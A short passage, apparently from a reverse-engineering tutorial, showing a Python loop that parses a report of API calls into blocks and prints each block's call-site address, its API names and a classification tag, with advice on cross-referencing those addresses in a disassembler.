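    for block in parse_blocks(SAMPLE_REPORT):
        print(f"block at {block.calls[0].ref:08X}: "
              f"{sorted(block.direct_api_names())} -> {classify(block)}")
```

Run it on the full report text (the bullets between each "APIs" heading and the next heading) to get one tag list per function; the call-site addresses it keeps can then be cross-referenced with the "ref:" values in the listing when the function is opened in a disassembler.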